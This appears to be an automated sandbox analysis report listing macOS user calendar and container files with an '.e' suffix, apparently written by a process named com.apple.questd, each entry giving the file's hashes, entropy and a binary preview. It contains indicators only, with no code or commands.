                                                                                                    SHA-256:E3976D58D060F0A8CEE9B8E5BB1D26C64B3B1C1D142915F71BCC08D2FB7DF4D3
                                                                                                    SHA-512:66E196BD3962C0364910AC10271832BDA31A53114A9CDC15B00C9D3582124EA9A61B6DC854F9406506D333B77E8830AFF7E13B520C096A109CC96D42A9051659
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+G~.....F@...}......G.J....<1w...............b.C.o&l.#.~....P.o3d...3G...S........AX.\.....Z.O+...M.M#d....."9c.MQ.......m.+..'.....AO..X.|C...s..}.z.....Y.r.{.#...7.:.....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/7C0AB787-231F-4589-A778-D020F80743CC.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):6.127684414109596
                                                                                                    Encrypted:false
                                                                                                    MD5:3F5F159E7D61E7920F02806B454BAC64
                                                                                                    SHA1:BDA6F80570BE91BEEE1F9E53A2D31498AE52D1D9
                                                                                                    SHA-256:6AE6CE5243101A053822EA6BCBD356DCA28C69B98D3C620A93179E9E7DF76C77
                                                                                                    SHA-512:B301227367EF015F3E7D3D5C7F4FD92ACFBCA1055146F3A985682274B6E68BDEEDEB8713CB102CCE5D034E1786C27A15086E48AA131FBCCB71FCE3D748C14B0F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+G..B.+.?7...6hV.E!...../T6l.]......mBL.....E./......M..QK+...B Od..Q.....}...Ej..P(C..@..D.........!QS..f..B7...`..Y..k ... ..?.}.y.p.b*....%...?..:9..v....n/m..LP...7.0.y.W..*...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/80F5EE42-BD13-4C76-AF7B-D5B67DB0982D.calendar/.Info.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1010
                                                                                                    Entropy (8bit):7.150868929064693
                                                                                                    Encrypted:false
                                                                                                    MD5:8B023E56F56CD254DD232522E9A4BCFE
                                                                                                    SHA1:B461BE261A814626DE0AA852CE71B7F81044D8B4
                                                                                                    SHA-256:567B0E6C404A8E38D1437A06FA9B50AABFA3288623A48D87568114C5FB3380D3
                                                                                                    SHA-512:09C94B7C7423F4FB3B9163BCB7AE35730900C9CCE5C29970A162029B9B68B0B0E960B81D8EB9C7F9F0C11320744B0EF06C9823B6F199DA89464D4C1D12AF2339
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:...............+..q...=9..P+..20........qY.U..S....D....#.T...6.........?...a.,..N....u..t..y8...HR4Ldj.,x.....d..B....1y...oVC.`.g........:.>&k..x*..E....#.;[.Dl.v6.%......p....A...|D.O/....7<y.....>.D.IM..[3.......P.. .T.9..P+..20.........+...B....K_...z.T..Q.H ....@..qb...5...f.\..,c..Q.z8'...:.N....Yue............jV...wj.S.....2i[%....hi.........p.D[.`G........:.4ZX..<Af.%.Dt....K.8hq.'}k....V..:..^.U..,:..`jV...wj..^{AxA..G.......a.G5.;.T5..y=.u...3(...LK.m.tX(...*..}..?...m.]o5..y=.u.u....5.4..?'...Jj/........!];... M..O..}..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/80F5EE42-BD13-4C76-AF7B-D5B67DB0982D.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):546
                                                                                                    Entropy (8bit):6.120904722977971
                                                                                                    Encrypted:false
                                                                                                    MD5:40B582AA344FC10A89901878F14F7013
                                                                                                    SHA1:10B185212694646482E5F129418548C0AF108725
                                                                                                    SHA-256:0A70078EA79169608DAD8781F30B24EFD3A033948C433EAED2A91822D68D82FE
                                                                                                    SHA-512:1FC10520FD0E833BEA214686D72DF131FA2DB3F08D53A567D5CB49DD13DAA19D12AA127626672C5EB4E4C47197C9DC1020D79A25A0673E1F961214BBC8F44AE3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+G....5.x.#..../A.w...W.;...m....<...m_m..oI...W..0.\~cy..p...2.u.00...E......h.M......?[..Z.O+...M.M#d....."9c.MQ.......m.+..'.....AO..X.|C...s..}.z.....Y.r.{.#...7.:.....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/80F5EE42-BD13-4C76-AF7B-D5B67DB0982D.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):6.164804015042487
                                                                                                    Encrypted:false
                                                                                                    MD5:57EBDCF783722A6489D3AEB5C1267CA6
                                                                                                    SHA1:49B32A192198BE13C2593D4550B317964AC233C5
                                                                                                    SHA-256:35F3BDA06EA157F4AC27DC7CD0F431AAA9DEE94E42E98A77E4774FD777E37DAD
                                                                                                    SHA-512:55D6736A062F50836BF464C1F8E6D9B0C69ABDF19AAC368E3D2F57A81907FCFEDCD625401B75E33B03A297621B56F79E07ADDF3120C4DE46F611ED8A82BFCA0C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+G....{..#A.QF8.}....P.E_....A.^`\....... [.R........]J..k...' P...T.4T.....Q....dj ..3)*GD.........!QS..f..B7...`..Y..k ... ..?.}.y.p.b*....%...?..:9..v....n/m..LP...7.0.y.W..*...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/E380CE29-FC53-41B4-8274-342A10683565.calendar/.Info.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1010
                                                                                                    Entropy (8bit):7.120801377789574
                                                                                                    Encrypted:false
                                                                                                    MD5:E288B93F8607331D669018B16B627C4B
                                                                                                    SHA1:38BD450851FBDEF88645E3A2FB0E6FB421F58867
                                                                                                    SHA-256:EF91188C904F4B4C201D1BC02F113075E500A51F272C058DCFF49F0180F5DDD6
                                                                                                    SHA-512:D69FC4CD97B57113A31C300156A784144ED73B85C0753DC61BAC772B41F00833FAB439CEAAC61BC8052F224983803EFDBB5D55CB898B309F45238D16E8063C43
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:...............+..q...=9..P+..20........qY.U..S....D....#.T...6.........?...a.,..N....u..t..y8...HR4Ldj.m..C..U....(...1y...oVC.`.g........:.>&k..x*..E....#.;[.Dl.v6.%......p....A...|D.O/......K..Cj....,.U..{r..G(.........I.F.v..O)...q..O.."...d.H..(....;1y...oVCEJ.?...i.U..:..w...n.R...r...i....*Q..;..q.....2...A...|..$.S...Y...?d.....*...K...T-.e._....`.(....7..rQj..L(p)./..B.J..U.tkA.A. .....+.....2Y....A...|.. ...A.".E..Y...@..?.....HR4Ldj..^r4|.Fm..../..1y...oVC....=.i..??g3...{r..G(...."..".`7.<z...G........n<....pj..........................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/E380CE29-FC53-41B4-8274-342A10683565.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):594
                                                                                                    Entropy (8bit):6.364712078492473
                                                                                                    Encrypted:false
                                                                                                    MD5:E0D465EF4B27710A65AED53851F795C0
                                                                                                    SHA1:B2216BFA1F4D6F39219E6205C44A024C06AF87F4
                                                                                                    SHA-256:9E904167465A102D413574FE43CC405FFCBB5820D633F1B9AC80ED577A934238
                                                                                                    SHA-512:2B1F46D785EF110129433BD7A0AB4C8F3B7EA23E1AD544BCDCA1F53CB95876FD7F916E6C730850005DC3625873C313F1E4D5EDAF156A1250326643E0A60F4504
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&...@[H._.T....x.f.]...q........yV2.sR....G...F........Z9..........t..ef8.0G......G...N.R.....FJ....v.|.....~J......00..1a...f.......=..,.o2.....D..r.3...T......=.%...?W:P.g.C......[...6l..\..j...x/.6..I.6......n#.|.;;Xy.%~...E.e.AK$..c.......V..<.}~...tQ..]...........!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/E380CE29-FC53-41B4-8274-342A10683565.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):594
                                                                                                    Entropy (8bit):6.343217251995012
                                                                                                    Encrypted:false
                                                                                                    MD5:24257824546F27B4360AE1957208EA59
                                                                                                    SHA1:08D10D0154D4D8A75C0CBCBE3FAD2BCF8AA7DCD9
                                                                                                    SHA-256:85324996FACE137579E04B3B39C149B0F3818CE7E884D9ADFFD61A9AB7EBCCF4
                                                                                                    SHA-512:283D52A11532DBACF7F1BE4E3B85BFA46DE89457376F5EFA1120FABC8C6337E25D63B9020AFE9A66E7CE17B33C874B96417FB266FDD4DED3475DEA308F7D0BE4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&...@[H._.T....x.f.]...q........yV2.sR....G...F........Z9..........t..ef8.0G......G...N.R.....FJ.....;.l?.{+DU...|".[R...yR....1.m.W...._......^.p..(....!....]I.......n.ER,q.....Q..[...6l..z{...T.Z.S..I.Du.....Y.....#.....W...}..:.....>.2.:..c..!.O.U.nI.#../......../..!................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/E57CDCEE-89E5-476A-9037-A6D973A76488.calendar/.Info.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1018
                                                                                                    Entropy (8bit):7.175107321248713
                                                                                                    Encrypted:false
                                                                                                    MD5:7DD41128F275A8C0DB8A8247277EA4A0
                                                                                                    SHA1:2A7756918BFF92D2EE013F18868E23E405947DA0
                                                                                                    SHA-256:079C6BBCFC1EB3A7F2DB3852F63A0AE7EF9FAF376B3EAAE6D96BF82DB457EF6E
                                                                                                    SHA-512:731F8600E87F75791ABF3613C9F54EE0E095AFC382D2038D667B5AE7E00E08E9721CC43BC87B56E52CE2F3EA3978CC037616A05FBA6D209FADE9DD28D7F8CCEF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n.......C...m.......DV.R..B.Y...aIf.........7.?P..|.X...J+.S...Y.........C.....u4..t.^j..OYRQ..d.......9.hp+.l.............5.....S<|o.M...:...............+..q...=9..P+..20........qY.U..S....D....#.T...6.........?...a.,..N....u..t..y8...HR4Ldj.....&.. t?K....1y...oVC.`.g........:.>&k..x*..E....#.;[.Dl.v6.%......p....A...|D.O/....7<y.....>.D.IM..[3.......P.. .T.9..P+..2..%.b.Xf.COEy..?.;.wTM.U..x.Zc.o...O}..h6x.Le.ZU...<L......7.T..h./.M5....*Q..;..q.....2...A...|..$.S...Y...?d.....*...K...T-.e._....`.(....7..rQj..L(p)./..B.J..U.tkA.A. .....+.....2Y....A...|.p.".s....N....u.@..?.....HR4Ldj.:..K../.....)....'...A...*..}..?...m.]o5..y=.u.u....5.4..?'...Jj/........!];...B.....WD..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/E57CDCEE-89E5-476A-9037-A6D973A76488.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):546
                                                                                                    Entropy (8bit):6.139905874437199
                                                                                                    Encrypted:false
                                                                                                    MD5:5E4FC0B7EBB2BC115F80D53D8038C2A4
                                                                                                    SHA1:8FF7147CF07170BE25C0548AA1F38DC46153078C
                                                                                                    SHA-256:8C23FB2D3A3188AD2447A5D957223E1438A48EA4C02A674B993E6B696D9806D6
                                                                                                    SHA-512:B0B06C3E958BE486F5DFB0D3C3C20FCF4E32A30578AF11133F681FEAD1BFD64450D8EAA8634D558B179AA2E0ADDC769A5AD291F65B340261EC714F0DFDEB5C19
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+G...~.<..T...RT......X.r...n..S...`g........A.......'..nL?).vx...$C........)IO...f~hi.....Z.O+...M.M#d....."9c.MQ.......m.+..'.....AO..X.|C...s..}.z.....Y.r.{.#.].!._.....................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Calendars/E57CDCEE-89E5-476A-9037-A6D973A76488.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):554
                                                                                                    Entropy (8bit):6.200427367918859
                                                                                                    Encrypted:false
                                                                                                    MD5:67F93E006249A5116BF72C9373862068
                                                                                                    SHA1:F8BA756DDEB9A598E732049CE555870B7F995576
                                                                                                    SHA-256:3EDDF3F4C15F8A554794982C07A635F7F2E38436796E9169F3CE184881A0B6BA
                                                                                                    SHA-512:18EA0956F2FE1824C8E902A37A930BDF2D3904A782AF505D7060FA9D872B6021382B3B257AB0AEC969F9D297E06704C24BC7360BABCC46187F39E19EE4765011
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: xu."u..L.Q...@..vr.I&......;.......6.;.S.b.:......E.A..4}.z........%..+G<..\.c..p.T._.?.....o.$......[.H),...3..D........'.........i..0.i7........3..].)k..tC.r.D.........!QS..f..B7...`..Y..k ... ..?.}.y.p.b*....%...?..:9..v....n/m..LP...7.0.%~...E...................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.AddressBook.ContactsAccountsService/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):31347
                                                                                                    Entropy (8bit):7.963906008863048
                                                                                                    Encrypted:false
                                                                                                    MD5:5579FF366763525692511CA48C5827BE
                                                                                                    SHA1:1AB941E822A629A1A97F2CB81CCB0E1ECD88C949
                                                                                                    SHA-256:EA7A2770208F6CCB5FD354B5EBC01B8D52F54A34CEF02AE62CBBAEE5B080DD87
                                                                                                    SHA-512:79EA77715D97FB5BFC7F21307A9A153E2E83271207BD1A3679663A339402A2A5EA7057C4D138DACC4C26F83C4F4715922912DC9D0AD191C23D343674FC73B977
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+..;r..?+...y...b6.re.....&...]..)..X"t...E[V.b..#...c.......x._tgK.J....3..0B,A..<.b..t.L`Y.....d...b....u...4......hG........i..A...4.......4........~..@.q.:.XG....4....t.b............=..L....s......p..s...c.G.eQ&.~.J...........;....v.`....?i.....o.M...Q..Yg..mX..P.Qd.SF.]...P.\.....4....t.b............=.-@.................F..3.\..f.!).7....3.9F..%/....\..&..S...Zb...#p?.....h...../....N..B.*\.o....a..p...c.../..y|q.?X.^.m,.........q.4."............M.........}.]...>...m,......8^.A..].....).....i.%+.E.)......3.g.;..Q.....T.........!f.....Z..J...,/......S$c]....;**".........t....)i).....W:........l...........,.G....N.T..........O...[.Ys......c....,{..2D...ec.s......c~Dt..H.`-.......s......cD..<....t.h..".O..4..Af...2.......e...<.L.>....T....".y...2...Q{...hP.%...Y...}%...s8.....Z........i3...............|.. $M_m...1Q...Q...lP...!...0....T...#..b..".cR.....]..|N.G....O~.Nm|....u.i...!.z....A<.....Y.:..C
                                                                                                    /Users/ben/Library/Containers/com.apple.CalendarAgent.CalNCService/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):54829
                                                                                                    Entropy (8bit):7.939145353208516
                                                                                                    Encrypted:false
                                                                                                    MD5:3BC61DBAEBC4700A294927129EAC2BD2
                                                                                                    SHA1:5F0578CF8885A9DBAA44DD32BA28F71BBB411E93
                                                                                                    SHA-256:FF6AA04E5AC73A351263FEDA13C0D95208C40374F0A6F999267FF0E8D2F26E09
                                                                                                    SHA-512:5769F4BCF351933330A5366FE6B8594321CE81403B29B3F292D0C3A22F8975C17A40F1A2D1D6B11CCB425AD52C3D45E957682DE8B34E4F2E4EEFABE099C352BC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+..t..i..,s.........Rss.=.n..o...s.........Y'.=.E.C..`..c..(.E^.B..../6...5&\.WJ............A..&vc.w......|..K.W.P.{.&.... .}.W.(.e...R.....Tg.[i.....R........;.....n...W.~.md..SR.U*..V.UH.N.........u\...O.U.7.'..0 .P..%.........s..K.'..s..K.'d.M....=X.8o..W<LC...E.....R........-xo.....7.q..iB.(^.wp5tT..L[?5.Z.A,.....=.7W'....;...~{..T..yP..:.c.T^.k......v...}......>......&....o.A'.I.$....... g.7..e.&.....o..r......c.:.`$....xl{..b..?......&....)G...H.....lGbV..y{...!.9>......%.U.`..Z....8..]*.n$T.\.sK.}..&.....@....ldE\gl.<.N....t..#5.S,...Tr(w.O..0CO...mx.<-2.,...Z.]C.G.t* .!..9...o]S.\...C......_4.G...(.1^.f........?>H...,<0.&n..........y...^..3..Y.3..B.w........h....3....6....k&yv.`...:.........XP(C..}.O.G..u.+.C>.C..|>....O(..8P..]J..|.._*......&.....).4.Pt........o......~.`...Z`...u9=@.....^.k..,...$......^..0j..I.zI..NUo/....x%9.|.jr..<O....B.s..R.....\:Au........x9...e)_t....l......3.3.../.}...
                                                                                                    /Users/ben/Library/Containers/com.apple.CalendarAgent/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):40452
                                                                                                    Entropy (8bit):7.9673198675376815
                                                                                                    Encrypted:false
                                                                                                    MD5:2F6C3FD25060630A901457337B15A7C8
                                                                                                    SHA1:FAEAD5F33B51FBD0F55D0431823AF20C6EC023C0
                                                                                                    SHA-256:30CF1EB05D2A27C5222AD432711B2D6E93DA9505BEC54862E3680588AEBA3186
                                                                                                    SHA-512:A994CF104F8DCA1BC6528A3285CBE31017A0EB0E943F915F383BEFEC1EBC9A7D1320472342FA77A94B3B9F0573608160C66E48A83D1638ACA04AB102A191B813
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R..j...z.R.;.jF....sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0P.+X..&...%...z.i....ui.M....n.\..E..+.6..\ T.L.WU..p.h..=..H..o.yM.@..19n1....13..7.e........@.@.....)1"Es.....3.......)-....A.7.._.9.#aRt.b..')-....A.)-....A.5.....F.'.u.9..1)-....A..t4.?UKY....F...\.b..)......B.9..].4.9.k....r.s$.......u..Z.\.^...&.E.-....aU.U]..3..m.b(..........&......6..WQt)-....A..t4.?UKY....k.H..A..gu.".$Q_M.E..g:....... 8kT..0M.....1....L8........We.L..9N^.}:.b.....`I*...wM.V]..0.........Mt.4..>]3.t....9.o....I..V.7b.7f.......>.....jP.I=..^.4`.,o../''..k&..4j.b._.S@.I.......9..H.......(..s....$e..U.....V.Q...:`.....M...4...['...........%....Z..:...<lN.3....7.3.3>../". ..j..^....[.Z.S..-....4."...............,..,..Gl'.eJ_Zvw-....\.:..<....f...U./B.......=.g...........ZtJe..z"$%.|C...g.......ZtJe._..r...K.@#*..0....ZtJe.1..m.....t...-.8Bk<.......2.3.&....pz..]D...........&Hk..?..:...0j/........t.j....a73......:.......g.U.C...r..H....|.. 5.".T...V-.|..c.....u.<....U<.u.. .+${.........k
                                                                                                    /Users/ben/Library/Containers/com.apple.CalendarAgent/Data/Library/Caches/com.apple.CalendarAgent/.Cache.db-shm.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33091
                                                                                                    Entropy (8bit):3.282521374075324
                                                                                                    Encrypted:false
                                                                                                    MD5:812CC34F47B73D0889A0A0C4C26CC1A8
                                                                                                    SHA1:D538AB0CBFE751ADF929BAFFA3B20774278D4B5F
                                                                                                    SHA-256:CEDBB99025FC7AF74039CF714D73219A98AE6B5E2384B195A0215A2FEC4D3E3F
                                                                                                    SHA-512:610D1842193EEFBDF1F5115E4CAA92F10ED4F41DF4C80D0365F1B2F93793976C34FBF62E826061A7834BFAD3A68E81EAB0AE663B629C28D4E6687EC1CDBA153D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: >.k....L6~Fe.............................\ck?N..>.k....L6~Fe.....................L.D<.+..\ck?N...........9.o..h$.9.o..h$.........................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.CalendarAgent/Data/Library/Caches/com.apple.CalendarAgent/.Cache.db-wal.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):305
                                                                                                    Entropy (8bit):4.227184134998451
                                                                                                    Encrypted:false
                                                                                                    MD5:4E6BDA8E6124B92D84A6F01E74479435
                                                                                                    SHA1:12E3E61BF223CAD272BAD62FAC40A6742DBA96C3
                                                                                                    SHA-256:67BAB761DDB4F0DE3AD683630D9B76C2ADA7136A36E8D2EC13023A59A9ECC178
                                                                                                    SHA-512:BF8999595A05AF4C039D28E3FC9B6098BA49C95C261448D94009924D636537132610B1975D2A1F972E33651A8F44C186A86CB0D49C51BAAA11D87168B2CEE66E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.CalendarAgent/Data/Library/Caches/com.apple.CalendarAgent/.Cache.db.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):53589
                                                                                                    Entropy (8bit):3.5730561443570683
                                                                                                    Encrypted:false
                                                                                                    MD5:40BEFF749B8CBEE0E4DF7ED2E7D08E6C
                                                                                                    SHA1:5903E6DBCC12A22D08743AE0D7171A62D7E84565
                                                                                                    SHA-256:6199DB6D4CA69E0A2FA03CA5A1E0418F25CE1949C0470672FEF88A3977E414D5
                                                                                                    SHA-512:1B1CF74FC4D86797ED645FC2FCDCE3B6C41DF450D296189D8D2B80A24A31AA623E46E22A69E0B5BE26ED64F667B8A35D2086E3FBB50C9FE0A92001EEFA08F981
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: .#.1rS..a....lT........t..S..0..........U.....5.~./..efrt...7...t...7............L.D<.+.......]!..1I............j.....".y.c.F0....h.X.3..........................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+..........................................................................................................................................................................................................................................................L.D<.+.................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.CalendarAgent/Data/Library/Preferences/.com.apple.CalendarAgent.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):378
                                                                                                    Entropy (8bit):5.110379110470767
                                                                                                    Encrypted:false
                                                                                                    MD5:2215F3F25E6D4C7325961C2390D27D26
                                                                                                    SHA1:280BB64EBE3225E8695B4091EABFC1DE4405C662
                                                                                                    SHA-256:66DAF4F6EE39609BD8A39A832F6F95567B723A60B07FA4FDF165366C906691C7
                                                                                                    SHA-512:F049780B4C621ABB3888282A1880A3FD836C068EBC199DD5B2A5B28A76A8001222669E61DC2850872A66BAFA444C2B20BA5719E6FDFD8FD9C7EA9AF0C532B6E2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R....F.........j.-1<) ........Wj.......|.. .#u....D...........&.....I................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Containers/com.apple.CalendarNotification.CalNCService/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):37548
                                                                                                    Entropy (8bit):7.969445430917819
                                                                                                    Encrypted:false
                                                                                                    MD5:0A2DB4CE201C91F0B8001A65CA5C81F3
                                                                                                    SHA1:76CD52A9CCD93841D917A0B070697A3ACA636F0A
                                                                                                    SHA-256:6273344DFAE1BCA0BD8E2F6B21BC155C03192A67FCC60F2D823B1FD01067A4F4
                                                                                                    SHA-512:6AC3F99628673FF96A5A875E380F546EAE3BB3DE631D500D556A9D2F8C87B09E5A914C6D9869FF4E957DB6E295726E190B23F007AD15CC7AC80F84EA4EA5CA5E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..@.7R......#f.9sF...-O..........~.]"n....)B.?...\..W..*.4.....zo*..$y.0...~.H.}..z..+....3|."!m~^.f.......6....{W.....?.+....H. .. e..4..S.).Kx.."...i...d.......=..5..@.....)1.Im....p".4.5.."....!oY....7a1E=.3[]........!oY.....!oY.5.....F.'.u.9..1....!oY.J.0.7x.h.>F.V.k..6....'..^.......].4.9.k......-.b.(?.2.!G......&..PbZ$........."f.2'5m..r...N'..=.,f.$a.C.../g4.....!oY.J.0.7x.h..7.....f.....`S2^.[b.X5..[..qh......b.......8......B...]....l.g.L..9N^..j>[T.e .Z..8...?!u.,....T9.Y...%"p.i_.....]g.J.d@(...G...]....p.JTI]...=..naV-.......$%o.}.v..Q.M^)..E]...3....@t...h................$%./.$-......%..<..1oh.8...].El}...8p.b._.J....l}.H.....C..%..t..p\D.. W.......Ov....~...4.........x..w..."......... *..\..1;...u.I.........c...~{K?\...4..}.H..>.UZ......0h}.f.aIq...`..J.W.)?.1.........q...`..J0u..).!..ym`....q...`..J'4.{..&OlWe../.N.[..E).JQ....e..!.... 4[y..K....f...!...0.ZGl.....P..^..oz.l..O..+P|..R.9\i.. ...............e......|.. .o8....z.}.....;.M+1.J...3.+x..t. .+${..eEi..........*.t
                                                                                                    /Users/ben/Library/Containers/com.apple.Chess/.Container.plist.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):29267
                                                                                                    Entropy (8bit):7.9592906473454255
                                                                                                    Encrypted:false
                                                                                                    MD5:35C734DBA310390314628E33C8AADE8F
                                                                                                    SHA1:00767135F55E6BBAD2F2F8A2C8A7AFB5F0302255
                                                                                                    SHA-256:BB94629486E14093A336911B07F15B120EFE27DA3D250F794518083439EF1045
